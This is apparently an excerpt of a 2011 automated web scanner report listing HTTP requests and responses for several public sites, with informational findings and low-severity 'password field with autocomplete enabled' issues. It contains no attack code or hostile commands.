Server: Microsoft-IIS/7.0
Set-Cookie: virtusa=csession=650730749&tid=2324094; expires=Wed, 01-Jun-2011 15:39:24 GMT; path=/
X-Powered-By: ASP.NET
Date: Tue, 01 Mar 2011 16:39:25 GMT
Connection: close


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>

<meta http-equiv="Co
...[SNIP]...

7.685. http://www.virtusa.com/services/application-development/  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.virtusa.com
Path:   /services/application-development/

Request

GET /services/application-development/ HTTP/1.1
Host: www.virtusa.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=213023891.1298986816.1.1.utmccn=(organic)|utmcsr=google|utmctr=Virtusa|utmcmd=organic; virtusa=csession=650730749&tid=2324094; __utma=213023891.1848117310.1298986816.1298986816.1298986816.1; __utmc=213023891; __utmb=213023891; ASPSESSIONIDCARSSRAC=JAMFJMGCCILFNOJAPOIFKBLI;

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Length: 24938
Content-Type: text/html
Server: Microsoft-IIS/7.0
Set-Cookie: virtusa=csession=650730749&tid=2324094; expires=Wed, 01-Jun-2011 15:36:02 GMT; path=/
X-Powered-By: ASP.NET
Date: Tue, 01 Mar 2011 16:36:03 GMT
Connection: close


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<meta http-equiv="Cont
...[SNIP]...

7.686. http://www.virtusa.com/services/consulting/  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.virtusa.com
Path:   /services/consulting/

Request

GET /services/consulting/ HTTP/1.1
Host: www.virtusa.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=213023891.1298986816.1.1.utmccn=(organic)|utmcsr=google|utmctr=Virtusa|utmcmd=organic; virtusa=csession=650730749&tid=2324094; __utma=213023891.1848117310.1298986816.1298986816.1298986816.1; __utmc=213023891; __utmb=213023891; ASPSESSIONIDCARSSRAC=JAMFJMGCCILFNOJAPOIFKBLI;

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Length: 23333
Content-Type: text/html
Server: Microsoft-IIS/7.0
Set-Cookie: virtusa=csession=650730749&tid=2324094; expires=Wed, 01-Jun-2011 15:35:30 GMT; path=/
X-Powered-By: ASP.NET
Date: Tue, 01 Mar 2011 16:35:31 GMT
Connection: close


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<meta http-equiv="Cont
...[SNIP]...

7.687. http://www.virtusa.com/services/legacy-asset-management/  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.virtusa.com
Path:   /services/legacy-asset-management/

Request

GET /services/legacy-asset-management/ HTTP/1.1
Host: www.virtusa.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=213023891.1298986816.1.1.utmccn=(organic)|utmcsr=google|utmctr=Virtusa|utmcmd=organic; virtusa=csession=650730749&tid=2324094; __utma=213023891.1848117310.1298986816.1298986816.1298986816.1; __utmc=213023891; __utmb=213023891; ASPSESSIONIDCARSSRAC=JAMFJMGCCILFNOJAPOIFKBLI;

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Length: 22502
Content-Type: text/html
Server: Microsoft-IIS/7.0
Set-Cookie: virtusa=csession=650730749&tid=2324094; expires=Wed, 01-Jun-2011 15:36:08 GMT; path=/
X-Powered-By: ASP.NET
Date: Tue, 01 Mar 2011 16:36:07 GMT
Connection: close


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<meta http-equiv="Cont
...[SNIP]...

7.688. http://www.virtusa.com/services/product-development/  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.virtusa.com
Path:   /services/product-development/

Request

GET /services/product-development/ HTTP/1.1
Host: www.virtusa.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=213023891.1298986816.1.1.utmccn=(organic)|utmcsr=google|utmctr=Virtusa|utmcmd=organic; virtusa=csession=650730749&tid=2324094; __utma=213023891.1848117310.1298986816.1298986816.1298986816.1; __utmc=213023891; __utmb=213023891; ASPSESSIONIDCARSSRAC=JAMFJMGCCILFNOJAPOIFKBLI;

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Length: 23316
Content-Type: text/html
Server: Microsoft-IIS/7.0
Set-Cookie: virtusa=csession=650730749&tid=2324094; expires=Wed, 01-Jun-2011 15:35:36 GMT; path=/
X-Powered-By: ASP.NET
Date: Tue, 01 Mar 2011 16:35:36 GMT
Connection: close


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<meta http-equiv="Cont
...[SNIP]...

7.689. http://www.virtusa.com/sitemap.asp  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.virtusa.com
Path:   /sitemap.asp

Request

GET /sitemap.asp HTTP/1.1
Host: www.virtusa.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=213023891.1298986816.1.1.utmccn=(organic)|utmcsr=google|utmctr=Virtusa|utmcmd=organic; virtusa=csession=650730749&tid=2324094; __utma=213023891.1848117310.1298986816.1298986816.1298986816.1; __utmc=213023891; __utmb=213023891; ASPSESSIONIDCARSSRAC=JAMFJMGCCILFNOJAPOIFKBLI;

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Length: 49599
Content-Type: text/html
Server: Microsoft-IIS/7.0
Set-Cookie: virtusa=csession=650730749&tid=2324094; expires=Wed, 01-Jun-2011 15:40:14 GMT; path=/
X-Powered-By: ASP.NET
Date: Tue, 01 Mar 2011 16:40:15 GMT
Connection: close


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<meta http-equiv="Cont
...[SNIP]...

7.690. http://www.virtusa.com/terms-conditions.asp  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.virtusa.com
Path:   /terms-conditions.asp

Request

GET /terms-conditions.asp HTTP/1.1
Host: www.virtusa.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=213023891.1298986816.1.1.utmccn=(organic)|utmcsr=google|utmctr=Virtusa|utmcmd=organic; virtusa=csession=650730749&tid=2324094; __utma=213023891.1848117310.1298986816.1298986816.1298986816.1; __utmc=213023891; __utmb=213023891; ASPSESSIONIDCARSSRAC=JAMFJMGCCILFNOJAPOIFKBLI;

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Length: 29081
Content-Type: text/html
Server: Microsoft-IIS/7.0
Set-Cookie: virtusa=csession=650730749&tid=2324094; expires=Wed, 01-Jun-2011 16:00:36 GMT; path=/
X-Powered-By: ASP.NET
Date: Tue, 01 Mar 2011 17:00:36 GMT
Connection: close


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<meta http-equiv="Cont
...[SNIP]...

8. Password field with autocomplete enabled  previous  next
There are 44 instances of this issue:

Issue background

Most browsers have a facility to remember user credentials that are entered into HTML forms. This function can be configured by the user and also by applications which employ user credentials. If the function is enabled, then credentials entered by the user are stored on their local computer and retrieved by the browser on future visits to the same application.

The stored credentials can be captured by an attacker who gains access to the computer, either locally or through some remote compromise. Further, methods have existed whereby a malicious web site can retrieve the stored credentials for other applications, by exploiting browser vulnerabilities or through application-level cross-domain attacks.



8.1. https://accounts.zoho.com/login  previous  next

Summary

Severity:   Low
Confidence:   Certain
Host:   https://accounts.zoho.com
Path:   /login

Request

GET /login?service_language=en&dcc=true&hide_title=true&servicename=ZohoDiscussions&hide_signup=true&serviceurl=http%3A%2F%2Fduck.co HTTP/1.1
Host: accounts.zoho.com
Connection: keep-alive
Referer: http://duck.co/portalLogin.do?serviceurl=/&forumGroupUrl=duckduckgo
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.98 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __utmz=168905406.1298947680.1.1.utmcsr=duck.co|utmccn=(referral)|utmcmd=referral|utmcct=/subscribeRegister.do; __utma=168905406.68197405.1298947680.1298947680.1298947680.1; __utmc=168905406; __utmb=168905406.1.10.1298947680; iamcsr=17d8938e-e664-4e84-8c5d-c1bc26754003; rtk=1298947649191; JSESSIONID=BC277CF3337675932ED541A636212CD9

Response

HTTP/1.1 200 OK
P3P: CP="CAO PSA OUR"
Set-Cookie: IAMAGENTTICKET=; Domain=.zoho.com; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/; Secure
Content-Type: text/html;charset=UTF-8
Vary: Accept-Encoding
Date: Tue, 01 Mar 2011 02:57:06 GMT
Server: ZWS
Content-Length: 20834


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1.dtd">


<html>
<head>
<title>Zoho Accounts</title>
<style type="text
...[SNIP]...
<div id="loginform">
           <form name=login id=login onsubmit="javascript:return submitlogin(this);" method="post">
            <table cellspacing="0" cellpadding="0" align="center">
...[SNIP]...
<td align="left"><input type=password name=pwd class="input" onkeypress="clearmsg()"></td>
...[SNIP]...

8.2. https://accounts.zoho.com/register  previous  next

Summary

Severity:   Low
Confidence:   Certain
Host:   https://accounts.zoho.com
Path:   /register

Request

GET /register?serviceurl=http%3A%2F%2Fwww.zoho.com%2F HTTP/1.1
Host: accounts.zoho.com
Connection: keep-alive
Referer: http://www.zoho.com/company.html
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.98 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __utmz=168905406.1298947680.1.1.utmcsr=duck.co|utmccn=(referral)|utmcmd=referral|utmcct=/subscribeRegister.do; __utma=168905406.68197405.1298947680.1298947680.1298947680.1; __utmc=168905406; __utmb=168905406.1.10.1298947680

Response

HTTP/1.1 200 OK
Set-Cookie: iamcsr=7d3e82ff-ab2d-4eba-994a-a42bd8a69509; Path=/
P3P: CP="CAO PSA OUR"
Set-Cookie: rtk=1298948216140; Domain=.zoho.com; Path=/
Set-Cookie: JSESSIONID=47CD6EF4F2FBFB5A52C054FF42EDD89F; Path=/; Secure
Content-Type: text/html;charset=UTF-8
Vary: Accept-Encoding
Date: Tue, 01 Mar 2011 02:56:55 GMT
Server: ZWS
Content-Length: 33823


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1.dtd">


<html>
<head>
   <title>Create New Account</title>
<script type="text
...[SNIP]...
<div class="registerform">
            <form name="register" id="register" onsubmit="return submitregister(this);" method="post">
               <input type="hidden" name="cdigest" value="d4f2798fe1f48767e3f7bacb663b13a05ae28b566d8227506504fdfae50c0109f389a783c98d671b2eb5419bc3191a0714d4a20a963f69edf5e7b08a159497ef"/>
...[SNIP]...
<div class="fieldrt">
        <input type="password" name="pwd" class="input" onfocus="showHints(this,2);" onkeypress="closemsg();" onblur="hideHints()"/>
        </div>
...[SNIP]...
<div class="fieldrt">
        <input type="password" name="cpwd" class="input" onkeypress="javascript:closemsg();"/>
        </div>
...[SNIP]...

8.3. http://bad-behavior.ioerror.us/wp-login.php  previous  next

Summary

Severity:   Low
Confidence:   Certain
Host:   http://bad-behavior.ioerror.us
Path:   /wp-login.php

Request

GET /wp-login.php HTTP/1.1
Host: bad-behavior.ioerror.us
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: bb2_screener_=1298752932+173.193.214.243;

Response

HTTP/1.1 200 OK
Server: nginx/0.8.53
Date: Sat, 26 Feb 2011 23:15:51 GMT
Content-Type: text/html; charset=UTF-8
Connection: close
Vary: Accept-Encoding
X-Powered-By: PHP/5.3.4
Set-Cookie: bb2_screener_=1298762151+173.193.214.243; path=/
Expires: Wed, 11 Jan 1984 05:00:00 GMT
Last-Modified: Sat, 26 Feb 2011 23:15:51 GMT
Cache-Control: no-cache, must-revalidate, max-age=0
Pragma: no-cache
Set-Cookie: wordpress_test_cookie=WP+Cookie+check; path=/; domain=.ioerror.us
Content-Length: 2466

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" dir="ltr" lang="en-US">
<head>
   <ti
...[SNIP]...
</h1>

<form name="loginform" id="loginform" action="http://bad-behavior.ioerror.us/wp-login.php" method="post">
   <p>
...[SNIP]...
<br />
       <input type="password" name="pwd" id="user_pass" class="input" value="" size="20" tabindex="20" /></label>
...[SNIP]...

8.4. http://bnxs.com/  previous  next

Summary

Severity:   Low
Confidence:   Certain
Host:   http://bnxs.com
Path:   /

Request

GET / HTTP/1.1
Host: bnxs.com
Proxy-Connection: keep-alive
Referer: http://bnxs.com/how-to-start-your-own-url-shortening-service/
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.98 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __unam=a4f97e2-12e67f5fa04-30536e6f-1; __utmz=173815280.1298824297.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=173815280.1099129627.1298824297.1298824297.1298824297.1; __utmc=173815280; __utmb=173815280.1.10.1298824297

Response

HTTP/1.1 200 OK
Date: Sun, 27 Feb 2011 16:39:24 GMT
Server: Apache/2.2.16 (Unix) mod_ssl/2.2.16 OpenSSL/0.9.8e-fips-rhel5 DAV/2 mod_auth_passthrough/2.1 mod_bwlimited/1.4 FrontPage/5.0.2.2635
X-Powered-By: PHP/5.2.14
X-Pingback: http://bnxs.com/xmlrpc.php
Content-Type: text/html; charset=UTF-8
Content-Length: 68791

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head profile="http://gmpg.org/xfn
...[SNIP]...
<div id="top-panel">
           
   <form action="http://bnxs.com/wp-login.php" method="post">
   <label for="log">
...[SNIP]...
<label for="pwd">PASSWORD &nbsp;&nbsp;<input type="password" name="pwd" id="pwd" size="10" /></label>
...[SNIP]...

8.5. http://bnxs.com/how-to-start-your-own-url-shortening-service/  previous  next

Summary

Severity:   Low
Confidence:   Certain
Host:   http://bnxs.com
Path:   /how-to-start-your-own-url-shortening-service/

Request

GET /how-to-start-your-own-url-shortening-service/ HTTP/1.1
Host: bnxs.com
Proxy-Connection: keep-alive
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.98 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Date: Sun, 27 Feb 2011 16:31:16 GMT
Server: Apache/2.2.16 (Unix) mod_ssl/2.2.16 OpenSSL/0.9.8e-fips-rhel5 DAV/2 mod_auth_passthrough/2.1 mod_bwlimited/1.4 FrontPage/5.0.2.2635
X-Powered-By: PHP/5.2.14
X-Pingback: http://bnxs.com/xmlrpc.php
Link: <http://bnxs.com/?p=3513>; rel=shortlink
Content-Type: text/html; charset=UTF-8
Content-Length: 46904

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head profile="http://gmpg.org/xfn
...[SNIP]...
<div id="top-panel">
           
   <form action="http://bnxs.com/wp-login.php" method="post">
   <label for="log">
...[SNIP]...
<label for="pwd">PASSWORD &nbsp;&nbsp;<input type="password" name="pwd" id="pwd" size="10" /></label>
...[SNIP]...

8.6. http://bnxs.com/wp-includes/js/tinymce/plugins/wordpress/wordpress.css  previous  next

Summary

Severity:   Low
Confidence:   Certain
Host:   http://bnxs.com
Path:   /wp-includes/js/tinymce/plugins/wordpress/wordpress.css

Request

GET /wp-includes/js/tinymce/plugins/wordpress/wordpress.css?ver=20081129 HTTP/1.1
Host: bnxs.com
Proxy-Connection: keep-alive
Accept: text/css,*/*;q=0.1
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.98 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __unam=a4f97e2-12e67f5fa04-30536e6f-1

Response

HTTP/1.1 404 Not Found
Date: Sun, 27 Feb 2011 16:31:37 GMT
Server: Apache/2.2.16 (Unix) mod_ssl/2.2.16 OpenSSL/0.9.8e-fips-rhel5 DAV/2 mod_auth_passthrough/2.1 mod_bwlimited/1.4 FrontPage/5.0.2.2635
X-Powered-By: PHP/5.2.14
X-Pingback: http://bnxs.com/xmlrpc.php
Expires: Wed, 11 Jan 1984 05:00:00 GMT
Cache-Control: no-cache, must-revalidate, max-age=0
Pragma: no-cache
Last-Modified: Sun, 27 Feb 2011 16:31:38 GMT
Content-Type: text/html; charset=UTF-8
Content-Length: 66212

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head profile="http://gmpg.org/xfn
...[SNIP]...
<div id="top-panel">
           
   <form action="http://bnxs.com/wp-login.php" method="post">
   <label for="log">
...[SNIP]...
<label for="pwd">PASSWORD &nbsp;&nbsp;<input type="password" name="pwd" id="pwd" size="10" /></label>
...[SNIP]...

8.7. https://cds.sun.com/is-bin/INTERSHOP.enfinity/WFS/CDS-CDS_Developer-Site/en_us/-/USD/ViewProductDetail-Start  previous  next

Summary

Severity:   Low
Confidence:   Certain
Host:   https://cds.sun.com
Path:   /is-bin/INTERSHOP.enfinity/WFS/CDS-CDS_Developer-Site/en_us/-/USD/ViewProductDetail-Start

Request

GET /is-bin/INTERSHOP.enfinity/WFS/CDS-CDS_Developer-Site/en_us/-/USD/ViewProductDetail-Start?ProductRef=jdk-6u24-javafx-1.3.1-oth-JPR@CDS-CDS_Developer HTTP/1.1
Host: cds.sun.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Sat, 26 Feb 2011 23:28:17 GMT
Server: Apache/2.0.59 (Unix)
Content-Length: 23592
Set-Cookie: sid=2kxpQCyaqs9pRGHzVt3gvjwrCXfdlGhFFya6APDZ1WJ3IOQZ-yY=; path=/
Set-Cookie: pgid=yYdgaHqkkjVSR0EUPIQsoQ3D0000gxhdzq1y; path=/
Cache-Control: no-cache,no-store,must-revalidate
Pragma: no-cache
Expires: Thu, 01 Dec 1994 16:00:00 GMT
Set-Cookie: CDS_DETECT=detect; Domain=.sun.com; Path=/
Accept-Ranges: bytes
Connection: close
Content-Type: text/html;charset=utf-8


<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loo
...[SNIP]...
<div class="cm1v5">
<form name="aForm" action="https://cds.sun.com/is-bin/INTERSHOP.enfinity/WFS/CDS-CDS_Developer-Site/en_US/-/USD/ViewFilteredProducts-SingleVariationTypeFilter" method="post">
<!-- <form action="https://identity.sun.com/amserver/UI/Login?program=cds&org=self_registered_users&goto=https%3A%2F%2Fcds.sun.com%2Fis-bin%2FINTERSHOP.enfinity%2FWFS%2FCDS-CDS_Developer-Site%2Fen_US%
...[SNIP]...
<td>

<input type="password" size="25" id="dnld_password" class="textinput formcheck validateString" name="IDToken2">

</td>
...[SNIP]...

8.8. https://client.trafficshaping.com/signin  previous  next

Summary

Severity:   Low
Confidence:   Certain
Host:   https://client.trafficshaping.com
Path:   /signin

Request

POST /signin HTTP/1.1
Host: client.trafficshaping.com
Connection: keep-alive
Referer: http://trafficshaping.com/
Cache-Control: max-age=0
Origin: http://trafficshaping.com
Content-Type: application/x-www-form-urlencoded
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.98 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: csId=3922e3f116c2b714cb30cd7f3271fd2d; __switchTo5x=95; __utmz=50089699.1298824334.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); MintUnique=1; MintUniqueHour=1298822400; MintUniqueDay=1298793600; MintUniqueWeek=1298793600; MintUniqueMonth=1296547200; MintAcceptsCookies=1; __unam=d903aed-12e67f689b8-53801d6e-3; __utma=50089699.1488621134.1298824334.1298824334.1298824334.1; __utmc=50089699; __utmb=50089699.3.10.1298824334
Content-Length: 29

email=&password=&action=login

Response

HTTP/1.1 200 OK
Date: Sun, 27 Feb 2011 16:42:43 GMT
Server: Apache/2.2.9 (Debian) PHP/5.3.3-0.dotdeb.1 with Suhosin-Patch mod_python/3.3.1 Python/2.5.2 mod_ssl/2.2.9 OpenSSL/0.9.8g
X-Powered-By: PHP/5.3.3-0.dotdeb.1
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Set-Cookie: csId=deleted; expires=Sat, 27-Feb-2010 16:42:42 GMT
Vary: Accept-Encoding
Keep-Alive: timeout=15, max=100
Connection: Keep-Alive
Content-Type: text/html
Content-Length: 4701

<!DOCTYPE html>
<html>
<head>
<meta http-equiv="Content-Type" content="text/html; charset=UTF-8" />
<title>TrafficShaping - Sign into Your Account</title>
<meta name="description" conten
...[SNIP]...
<div align="center"><form name="signin" method="post" class="listform">
   <ol>
...[SNIP]...
</label>
           <input type="password" size="16" name="password" />
       </li>
...[SNIP]...

8.9. http://dev.qwerly.com/member/register  previous  next

Summary

Severity:   Low
Confidence:   Certain
Host:   http://dev.qwerly.com
Path:   /member/register

Request

GET /member/register HTTP/1.1
Host: dev.qwerly.com
Proxy-Connection: keep-alive
Referer: http://dev.qwerly.com/
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.98 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __utmz=78868500.1298945321.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utmz=60340024.1298947790.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=60340024.188782387.1298947790.1298947790.1298947790.1; __utmc=60340024; __utmb=60340024.1.10.1298947790; __qca=P0-2075914333-1298947790163; __utma=78868500.1042130367.1298945321.1298945321.1298947759.2; __utmc=78868500; __utmb=78868500.4.10.1298947759

Response

HTTP/1.1 200 OK
P3P: policyref="/w3c/p3p.xml",CP="CAO COR CURa ADMa DEVa TAIa OUR BUS IND UNI COM NAV INT STA"
P3P: CP="CAO COR CURa ADMa DEVa TAIa OUR BUS IND UNI COM STAT IDC DSP PHY ONL"
Set-Cookie: MASH=23e57d83e50b0186fd41d49e789ad016; path=/; HttpOnly
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Content-Type: text/html; charset=utf-8
Content-Length: 11504
ETag: "9266c469"
Date: Tue, 01 Mar 2011 02:59:43 GMT
Server: Mashery Proxy

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head>

...[SNIP]...
</script>

<form action="/member/register" method="post" enctype="multipart/form-data" id="member-register">
<fieldset>
...[SNIP]...
<dd class="require">
<input type="password" name="passwd_new" value="" id="passwd_new" class="input-password passwd_new require" auto_complete="off" />
</dd>
...[SNIP]...
<dd class="require">
<input type="password" name="passwd_again" value="" id="passwd_again" class="input-password passwd_again require" auto_complete="off" />
</dd>
...[SNIP]...

8.10. http://forums.winamp.com/  previous  next

Summary

Severity:   Low
Confidence:   Certain
Host:   http://forums.winamp.com
Path:   /

Request

GET / HTTP/1.1
Host: forums.winamp.com
Proxy-Connection: keep-alive
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.98 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Date: Sun, 27 Feb 2011 17:42:29 GMT
Server: Apache
Set-Cookie: bblastvisit=1298828549; expires=Mon, 27-Feb-2012 17:42:29 GMT; path=/
Set-Cookie: bblastactivity=0; expires=Mon, 27-Feb-2012 17:42:29 GMT; path=/
Cache-Control: private
Pragma: private
X-UA-Compatible: IE=7
Connection: close
Content-Type: text/html; charset=utf-8
Content-Length: 111158

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" dir="ltr" lang="en">
<head>

<!
...[SNIP]...
<!-- login form -->
       <form action="login.php?do=login" method="post" onsubmit="md5hash(vb_login_password, vb_login_md5password, vb_login_md5password_utf, 0)">
       <script type="text/javascript" src="clientscript/vbulletin_md5.js?v=386">
...[SNIP]...
<td><input type="password" class="bginput" style="font-size: 11px" name="vb_login_password" id="navbar_password" size="10" tabindex="102" /></td>
...[SNIP]...

8.11. http://forums.winamp.com/forumdisplay.php  previous  next

Summary

Severity:   Low
Confidence:   Certain
Host:   http://forums.winamp.com
Path:   /forumdisplay.php

Request

GET /forumdisplay.php?f=8 HTTP/1.1
Host: forums.winamp.com
Proxy-Connection: keep-alive
Referer: http://forums.winamp.com/
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.98 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
